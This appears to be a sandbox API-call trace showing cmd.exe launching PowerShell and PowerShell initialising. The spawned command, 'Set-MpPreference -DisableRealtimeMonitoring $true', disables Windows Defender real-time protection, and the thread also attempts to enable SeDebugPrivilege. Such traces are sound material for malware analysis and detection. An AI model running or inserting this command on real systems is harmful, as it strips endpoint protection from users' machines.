	[0046.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.599] GetLastError () returned 0x2
	[0046.599] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0046.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0x373020
	[0046.599] GetProcessHeap () returned 0x360000
	[0046.600] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x14) returned 0x36fbd0
	[0046.600] FindClose (in: hFindFile=0x373020 | out: hFindFile=0x373020) returned 1
	[0046.600] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0xffffffff
	[0046.600] GetLastError () returned 0x2
	[0046.600] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", fInfoLevelId=0x1, lpFindFileData=0x17eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x17eb28) returned 0x373020
	[0046.600] GetProcessHeap () returned 0x360000
	[0046.600] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x36fbd0, Size=0x4) returned 0x36fbd0
	[0046.600] FindClose (in: hFindFile=0x373020 | out: hFindFile=0x373020) returned 1
	[0046.600] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0046.600] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0046.600] GetConsoleTitleW (in: lpConsoleTitle=0x17f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0046.600] InitializeProcThreadAttributeList (in: lpAttributeList=0x17eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x17ef70 | out: lpAttributeList=0x17eea8, lpSize=0x17ef70) returned 1
	[0046.601] UpdateProcThreadAttribute (in: lpAttributeList=0x17eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x17ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x17eea8, lpPreviousValue=0x0) returned 1
	[0046.601] GetStartupInfoW (in: lpStartupInfo=0x17ee64 | out: lpStartupInfo=0x17ee64*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0046.601] GetProcessHeap () returned 0x360000
	[0046.601] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x18) returned 0x373020
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0046.601] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0046.602] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0046.602] GetProcessHeap () returned 0x360000
	[0046.602] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x373020 | out: hHeap=0x360000) returned 1
	[0046.602] GetProcessHeap () returned 0x360000
	[0046.602] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xa) returned 0x36d600
	[0046.602] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
	[0046.604] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x17ef04*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x17ef50 | out: lpCommandLine="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x17ef50*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf04, dwThreadId=0xf08)) returned 1
	[0046.609] CloseHandle (hObject=0x4c) returned 1
	[0046.609] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0046.609] GetProcessHeap () returned 0x360000
	[0046.609] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x371ea0 | out: hHeap=0x360000) returned 1
	[0046.609] GetEnvironmentStringsW () returned 0x371ea0*
	[0046.609] GetProcessHeap () returned 0x360000
	[0046.609] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x97a) returned 0x3704f8
	[0046.610] FreeEnvironmentStringsW (penv=0x371ea0) returned 1
	[0046.610] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0061.545] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x17ee44 | out: lpExitCode=0x17ee44*=0x1) returned 1
	[0061.545] CloseHandle (hObject=0x50) returned 1
	[0061.546] _vsnwprintf (in: _Buffer=0x17ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x17ee50 | out: _Buffer="00000001") returned 8
	[0061.546] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1
	[0061.546] GetProcessHeap () returned 0x360000
	[0061.546] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3704f8 | out: hHeap=0x360000) returned 1
	[0061.546] GetEnvironmentStringsW () returned 0x373040*
	[0061.546] GetProcessHeap () returned 0x360000
	[0061.546] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x9a0) returned 0x3704f8
	[0061.546] FreeEnvironmentStringsW (penv=0x373040) returned 1
	[0061.546] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0061.546] GetProcessHeap () returned 0x360000
	[0061.546] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3704f8 | out: hHeap=0x360000) returned 1
	[0061.546] GetEnvironmentStringsW () returned 0x373040*
	[0061.546] GetProcessHeap () returned 0x360000
	[0061.546] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x9a0) returned 0x3704f8
	[0061.546] FreeEnvironmentStringsW (penv=0x373040) returned 1
	[0061.546] GetProcessHeap () returned 0x360000
	[0061.546] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x36d600 | out: hHeap=0x360000) returned 1
	[0061.546] DeleteProcThreadAttributeList (in: lpAttributeList=0x17eea8 | out: lpAttributeList=0x17eea8) 
	[0061.546] _get_osfhandle (_FileHandle=1) returned 0x7
	[0061.546] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0061.547] _get_osfhandle (_FileHandle=1) returned 0x7
	[0061.547] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0061.547] _get_osfhandle (_FileHandle=0) returned 0x3
	[0061.547] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0061.547] SetConsoleInputExeNameW () returned 0x1
	[0061.547] GetConsoleOutputCP () returned 0x1b5
	[0061.547] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0061.547] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0061.547] exit (_Code=1) 

Process:
	id = "12"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7ee17660"
	os_pid = "0xf04"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "11"
	os_parent_pid = "0xeec"
	cmd_line = "powershell  Set-MpPreference -DisableRealtimeMonitoring $true"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 29
	os_tid = 0xf08

	[0048.534] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0048.725] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0048.725] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0048.725] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0048.725] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0049.218] GetVersionExW (in: lpVersionInformation=0x3c3538*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3c3538*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0049.218] GetLastError () returned 0x2
	[0049.221] GetVersionExW (in: lpVersionInformation=0x3c3538*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3c3538*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0049.221] GetLastError () returned 0x2
	[0049.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22e2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0049.227] GetLastError () returned 0x2
	[0049.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22e2c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0049.231] GetLastError () returned 0x2
	[0049.232] GetVersionExW (in: lpVersionInformation=0x3c3538*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3c3538*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0049.232] GetLastError () returned 0x2
	[0049.233] SetErrorMode (uMode=0x1) returned 0x1
	[0049.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22e748 | out: lpFileInformation=0x22e748*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa963141, ftCreationTime.dwHighDateTime=0x1cb88fa, ftLastAccessTime.dwLowDateTime=0xa963141, ftLastAccessTime.dwHighDateTime=0x1cb88fa, ftLastWriteTime.dwLowDateTime=0xa9892a1, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0049.234] GetLastError () returned 0x2
	[0049.235] SetErrorMode (uMode=0x1) returned 0x1
	[0049.236] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22e7cc | out: lpdwHandle=0x22e7cc) returned 0x94c
	[0049.238] GetLastError () returned 0x0
	[0049.239] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1f14d8c | out: lpData=0x1f14d8c) returned 1
	[0049.243] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e798, puLen=0x22e794 | out: lplpBuffer=0x22e798*=0x1f14e28, puLen=0x22e794) returned 1
	[0049.245] lstrlenW (lpString="䅁") returned 1
	[0049.253] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x1f14f04, puLen=0x22e710) returned 1
	[0049.254] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0049.255] lstrcpyW (in: lpString1=0x3c3520, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0049.255] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x1f14f58, puLen=0x22e710) returned 1
	[0049.255] lstrlenW (lpString="System.Management.Automation") returned 28
	[0049.255] lstrcpyW (in: lpString1=0x3c3520, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0049.255] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x1f14fb4, puLen=0x22e710) returned 1
	[0049.255] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0049.255] lstrcpyW (in: lpString1=0x3c3520, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0049.256] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x1f14ff4, puLen=0x22e710) returned 1
	[0049.256] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0049.256] lstrcpyW (in: lpString1=0x3c3520, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0049.256] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x1f1505c, puLen=0x22e710) returned 1
	[0049.256] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0049.256] lstrcpyW (in: lpString1=0x3c3520, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0049.256] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x1f150f8, puLen=0x22e710) returned 1
	[0049.256] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0049.256] lstrcpyW (in: lpString1=0x3c3520, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0049.256] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x1f1515c, puLen=0x22e710) returned 1
	[0049.256] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0049.256] lstrcpyW (in: lpString1=0x3c3520, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0049.256] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x1f151d8, puLen=0x22e710) returned 1
	[0049.256] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0049.256] lstrcpyW (in: lpString1=0x3c3520, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0049.256] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x1f14e80, puLen=0x22e710) returned 1
	[0049.256] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0049.256] lstrcpyW (in: lpString1=0x3c3520, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0049.257] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x0, puLen=0x22e710) returned 0
	[0049.257] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x0, puLen=0x22e710) returned 0
	[0049.257] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22e714, puLen=0x22e710 | out: lplpBuffer=0x22e714*=0x0, puLen=0x22e710) returned 0
	[0049.257] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e708, puLen=0x22e704 | out: lplpBuffer=0x22e708*=0x1f14e28, puLen=0x22e704) returned 1
	[0049.258] VerLanguageNameW (in: wLang=0x0, szLang=0x3c3520, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0049.259] VerQueryValueW (in: pBlock=0x1f14d8c, lpSubBlock="\\", lplpBuffer=0x22e71c, puLen=0x22e718 | out: lplpBuffer=0x22e71c*=0x1f14db4, puLen=0x22e718) returned 1
	[0049.265] GetCurrentProcessId () returned 0xf04
	[0049.275] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x22df54 | out: lpLuid=0x22df54*(LowPart=0x14, HighPart=0)) returned 1
	[0049.277] GetLastError () returned 0x0
	[0049.278] GetCurrentProcess () returned 0xffffffff
	[0049.278] GetLastError () returned 0x0
	[0049.280] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x22df50 | out: TokenHandle=0x22df50*=0x2e4) returned 1
	[0049.280] GetLastError () returned 0x0
	[0049.282] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x1f178cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0049.282] GetLastError () returned 0x514
	[0049.284] CloseHandle (hObject=0x2e4) returned 1
	[0049.284] GetLastError () returned 0x514
	[0049.289] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf04) returned 0x2e4
	[0049.289] GetLastError () returned 0x514
	[0049.310] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x1f17910, cb=0x100, lpcbNeeded=0x22e744 | out: lphModule=0x1f17910, lpcbNeeded=0x22e744) returned 1
	[0049.311] GetLastError () returned 0x514
	[0049.314] GetModuleInformation (in: hProcess=0x2e4, hModule=0x22280000, lpmodinfo=0x1f17a50, cb=0xc | out: lpmodinfo=0x1f17a50*(lpBaseOfDll=0x22280000, SizeOfImage=0x72000, EntryPoint=0x22287363)) returned 1
	[0049.314] GetLastError () returned 0x514
	[0049.316] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x22280000, lpBaseName=0x3c3ce0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0049.316] GetLastError () returned 0x514
	[0049.317] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x22280000, lpFilename=0x3c3ce0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0049.317] GetLastError () returned 0x514
	[0049.318] CloseHandle (hObject=0x2e4) returned 1
	[0049.318] GetLastError () returned 0x514
	[0049.319] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf04) returned 0x2e4
	[0049.319] GetLastError () returned 0x514
	[0049.321] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x1f16f00 | out: lpExitCode=0x1f16f00*=0x103) returned 1
	[0049.321] GetLastError () returned 0x514
	[0049.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f15278, Length=0x20000, ResultLength=0x22e78c | out: SystemInformation=0x2f15278, ResultLength=0x22e78c*=0xad80) returned 0x0
	[0049.346] EnumWindows (lpEnumFunc=0x1d63612, lParam=0x0) returned 1
	[0049.348] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.348] GetLastError () returned 0x514
	[0049.348] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.348] GetLastError () returned 0x514
	[0049.348] GetWindowThreadProcessId (in: hWnd=0x200ce, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.348] GetLastError () returned 0x514
	[0049.349] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcac
	[0049.349] GetLastError () returned 0x514
	[0049.349] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.349] GetLastError () returned 0x514
	[0049.349] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8b0
	[0049.349] GetLastError () returned 0x514
	[0049.349] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8f0
	[0049.351] GetLastError () returned 0x514
	[0049.351] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x450
	[0049.351] GetLastError () returned 0x514
	[0049.351] GetWindowThreadProcessId (in: hWnd=0x100e0, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.351] GetLastError () returned 0x514
	[0049.351] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.352] GetLastError () returned 0x514
	[0049.352] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.352] GetLastError () returned 0x514
	[0049.352] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.352] GetLastError () returned 0x514
	[0049.352] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.352] GetLastError () returned 0x514
